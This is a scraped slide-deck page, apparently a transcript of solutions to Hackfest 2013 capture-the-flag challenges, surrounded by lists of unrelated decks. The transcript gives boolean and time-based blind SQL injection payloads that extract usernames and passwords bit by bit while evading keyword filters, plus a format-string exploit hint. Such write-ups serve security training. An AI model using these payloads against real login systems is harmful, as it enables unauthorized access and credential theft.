Web login and crackme's

November 18, 2013

220

Web login and crackme's

Solution to Web login (SQL injection) and Crack-me challenges presented at hackfest 2013 by @MrUn1k0d3r. Challenges presented at montrehack (http://montrehack.ca/).

Olivier Bilodeau

November 18, 2013

Other Decks in Technology

See All in Technology

オープンソースAIとは何か？ --「オープンソースAIの定義 v1.0」詳細解説

shujisado

670

ドメイン名の終活について - JPAAWG 7th -

mikit

20k

Lexical Analysis

shigashiyama

150

[CV勉強会@関東 ECCV2024 読み会] オンラインマッピング x トラッキング MapTracker: Tracking with Strided Memory Fusion for Consistent Vector HD Mapping (Chen+, ECCV24)

abemii

220

Why does continuous profiling matter to developers? #appdevelopercon

salaboy

180

SSMRunbook作成の勘所_20241120

koichiotomo

130

10XにおけるData Contractの導入について: Data Contract事例共有会

10xinc

590

Python(PYNQ)がテーマのAMD主催のFPGAコンテストに参加してきた

iotengineer22

470

AIチャットボット開発への生成AI活用

ryomrt

170

Why App Signing Matters for Your Android Apps - Android Bangkok Conference 2024

akexorcist

120

SREが投資するAIOps ~ペアーズにおけるLLM for Developerへの取り組み~

takumiogawa

100

OCI 運用監視サービス概要

oracle4engineer

PRO

4.8k

Featured

See All Featured

Statistics for Hackers

jakevdp

796

220k

ピンチをチャンスに：未来をつくるプロダクトロードマップ #pmconf2020

aki_iinuma

109

49k

A Philosophy of Restraint

colly

203

16k

Being A Developer After 40

akosma

590k

KATA

mclloyd

14k

Product Roadmaps are Hard

iamctodd

PRO

11k

Designing Experiences People Love

moore

138

23k

Designing for Performance

lara

604

68k

The Cost Of JavaScript in 2023

addyosmani

6.7k

Understanding Cognitive Biases in Performance Measurement

bluesmoon

1.4k

We Have a Design System, Now What?

morganepeng

7.2k

RailsConf 2023

tenderlove

900

Transcript

CrackMe: Windows Dropper + DLL
None
None
CrackMe: Format String Exploit
Solution: %016llx au lieu de %08x
None
Web: Boolean Injection SQL doesnotexist') || if(1=1, 12, 34) =
12 # doesnotexist') || if(1=2, 12, 34) = 12 # Caractères interdit: /(union|char|sleep|benchmark)/i
admin') AND IF(SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT GROUP_CONCAT(username, 0x7c, password) FROM login3.users), 22, 1)),
16, 2)), 7, 1) = 1, 3421, 6792) = 3421 #
Web: Time Blind Injection SQL Caractères interdit: /(union|char|and|or\s\S|\s\S|sleep|sha1|md5|if)/i admin')/**/&&/**/benchmark(300000000,(select/**/1))/**/#
admin')/**/&&/**/case/**/when/**/ (SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT/**/GROUP_CONCAT(us ername,0x7c,password)/**/FROM/**/login5.users),24,1)),16,2)),7,1))=1/**/the n/**/benchmark(55000000,(select/**/1))/**/end/**/#

Web login and crackme's

Web login and crackme's

Olivier Bilodeau

Other Decks in Technology

Featured

Transcript

CrackMe: Windows Dropper + DLL

CrackMe: Format String Exploit

Solution: %016llx au lieu de %08x

Web: Boolean Injection SQL doesnotexist') || if(1=1, 12, 34) =

admin') AND IF(SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT GROUP_CONCAT(username, 0x7c, password) FROM login3.users), 22, 1)),

Web: Time Blind Injection SQL Caractères interdit: /(union|char|and|or\s\S|\s\S|sleep|sha1|md5|if)/i admin')//&&//benchmark(300000000,(select//1))//#

admin')//&&//case//when// (SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT//GROUP_CONCAT(us ername,0x7c,password)//FROM//login5.users),24,1)),16,2)),7,1))=1//the n//benchmark(55000000,(select//1))//end//#